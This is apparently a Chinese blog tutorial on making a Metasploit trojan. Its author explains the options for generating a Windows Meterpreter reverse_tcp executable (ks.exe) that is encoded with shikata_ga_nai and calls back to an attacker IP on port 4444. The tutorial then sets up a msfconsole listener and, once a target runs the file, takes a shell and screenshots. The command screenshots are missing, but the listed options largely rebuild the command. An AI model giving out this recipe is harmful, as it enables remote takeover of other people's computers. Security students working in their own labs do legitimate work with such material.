Metaploit木马制作(无免杀毒)

系统:kali,ip:192.168.43.16

所有需要输入的命令均在<     >中

打开终端;

使用查看自己的ip

Metaploit木马制作(无免杀毒)_第1张图片

使用命令生成木马程序

Metaploit木马制作(无免杀毒)_第2张图片

ks.exe>

windows/meterpreter/reverse_tcp(利用windows/meterpreter/reverse_tcp漏洞)

-e x86/shikata_ga_nai(靶机win10是64位,所以应选择对应的编码格式否则,可执行文件再次打开时会出现错误)

 -i 5 (代表编码次数为5次)

-b '0x00' (避免出现的值)

LHOST=192.168.43.16 (设置本机也就是kali的ip)

 LPORT=4444(设置端口,因为默认端口为4444所以我也填写的4444)

-f exe (生成exe的可执行文件)

>ks.exe(生成的文件名为ks.exe)

Metaploit木马制作(无免杀毒)_第3张图片

此处可以看到生成的文件有7KB左右大小

下一步要找到生成的文件,可以使用ls查看当前目录,找到目标文件

Metaploit木马制作(无免杀毒)_第4张图片

 

打开metaploit,msfconsole

Metaploit木马制作(无免杀毒)_第5张图片

打开监听模块

加载一枚payload,

可以使用show options查看需要设置的参数

Metaploit木马制作(无免杀毒)_第6张图片

可以看到,我们需要设置lhost

set lhost 192.168.43.16(此处为kali的ip)

运行监听模块

此时,只要在靶机中运行木马程序,就会反弹会话,使用shell命令拿到shell(出现metepreter就表示已经反弹会话了)

Metaploit木马制作(无免杀毒)_第7张图片

此时可以看到已经进入目标主机,可以打开目标主机的命令操作目标主机,也可以在meterpreter会话端进行各种操作,(例如screenshot截取目标主机此时屏幕),后面会再搜索一下meterpreter会话端的命令进行总结。

 

你可能感兴趣的:(kali工具利用)